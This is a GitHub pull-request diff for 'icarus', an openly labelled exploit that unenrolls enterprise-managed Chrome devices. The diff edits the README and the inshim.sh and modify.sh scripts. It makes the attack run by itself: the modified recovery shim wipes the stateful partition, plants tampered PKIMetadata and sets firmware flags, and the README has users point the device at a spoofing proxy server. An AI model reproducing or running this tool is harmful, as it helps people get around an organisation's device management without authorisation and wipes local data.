Merge pull request #7 from MunyDev/dev

Make inshim.sh run fully automatically

README.md

@@ -12,12 +12,15 @@ An exploit for Chrome devices which allows people to unenroll devices with devic
 ## Setup and installation instructions
 Clone the repo with ``git clone --recursive https://github.com/MunyDev/icarus/`` and change directory to it.
 
-Set up the environment by running the following commands (Make sure you have both python3 and python3-venv installed beforehand):
+Set up the environment by running the following commands (Make sure you have python3, python3-venv, and protobuf installed beforehand):
 
 - `make setup-venv`
 - `make enter-venv`
 - `make setup-python`
 - `make build-packed-data`
+
+Before continuing, open Chrome on your build machine and go to chrome://components. Press CTRL + F and search for "PKIMetadata". Once you find it, press "Check for Updates". Make sure it says up-to-date before continuing (and that the version is below 2000.)
+  
 - `bash get_original_data.sh`
 - `bash make_out.sh myCA.der`
 
@@ -27,11 +30,7 @@ Now, to modify the shim with the generated PKIMetadata:
 
 - `bash modify.sh <shim path>`
 
-Now boot the shim, and in the terminal of the shim, run these commands:
+Now boot the shim, and ICARUS will attempt to modify your stateful partition.
-
-`mount /dev/disk/by-label/STATE /mnt/stateful_partition`
-
-`bash /mnt/stateful_partition/usr/bin/inshim.sh`
 
 ### Server setup
 Requirements: npm, node  
@@ -44,6 +43,21 @@ Reboot the device. You'll boot into verified mode. Once you have your server run
 - Set HTTPS IP to the IP you used to host the proxy server. 
 - Resume setup and your device will unenroll. 
 
+## Troubleshooting
+
+<details>
+  <summary>During building, everything starting from root was copied into original!</summary>
+
+  Please run ``git pull`` on your local copy. This bug has been fixed.
+</details>
+
+<details>
+  <summary>My device says "Can't reach Google"!</summary>
+  
+  - Make sure your device and the server are connected to the same network
+  - If that didn't work, powerwash your device and re-run the modified shim, and keep the server running.
+</details>
+
 ## Credits
 - [MunyDev](https://github.com/MunyDev) - Creating this exploit
 - [Archimax](https://github.com/EnterTheVoid-x86) - Cleaning up get_original_data.sh and inshim.sh + README changes

inshim.sh

@@ -1,6 +1,11 @@
 #!/bin/bash
 
-[ "$EUID" -ne 0 ] && echo "Run this as root"
+[ "$EUID" -ne 0 ] && fail "Not running as root, this shouldn't happen! Failing."
+
+fail() {
+	printf "%b\n" "$*" >&2 || :
+	sleep 1d
+}
 
 get_largest_cros_blockdev() {
 	local largest size dev_name tmp_size remo
@@ -32,14 +37,16 @@ mount /dev/disk/by-label/STATE /mnt/stateful_partition/
 cros_dev="$(get_largest_cros_blockdev)"
 if [ -z "$cros_dev" ]; then
     echo "No CrOS SSD found on device. Failing."
-    exit 1
+    sleep 1d
 fi
 stateful=$(format_part_number "$cros_dev" 1)
-mkfs.ext4 -F "$stateful" # This only wipes the stateful partition
+mkfs.ext4 -F "$stateful" || fail "Failed to wipe stateful." # This only wipes the stateful partition 
-mount "$stateful" /tmp
+mount "$stateful" /tmp || fail "Failed to mount stateful."
 mkdir -p /tmp/unencrypted
 cp /mnt/stateful_partition/usr/share/packeddata/. /tmp/unencrypted/ -rvf
 chown 1000 /tmp/unencrypted/PKIMetadata -R
 rm /tmp/.developer_mode
 umount /tmp
-crossystem disable_dev_request=1
+crossystem disable_dev_request=1 || fail "Failed to set disable_dev_request."
+read -p "Finished! Press enter to reboot."
+reboot

modify.sh

@@ -84,11 +84,11 @@ mount -o rw "$LOOP_DEV"p1 "$MOUNT_DIR"
 mkdir -p "$MOUNT_DIR/usr/share/packeddata"
 cp -rvf "./out/." "$MOUNT_DIR/usr/share/packeddata"
 mkdir -p "$MOUNT_DIR"/usr/bin
-cp "inshim.sh" "$MOUNT_DIR/usr/bin/inshim.sh"
 umount "$MOUNT_DIR"
 enable_rw_mount "$LOOP_DEV"p3
 mount "$LOOP_DEV"p3 "$MOUNT_DIR"
-echo "bash" > "$MOUNT_DIR/usr/sbin/factory_install.sh"
+cp "inshim.sh" "$MOUNT_DIR/usr/sbin/factory_install.sh"
+chmod +x "$MOUNT_DIR/usr/sbin/factory_install.sh"
 
 umount "$MOUNT_DIR"
 sync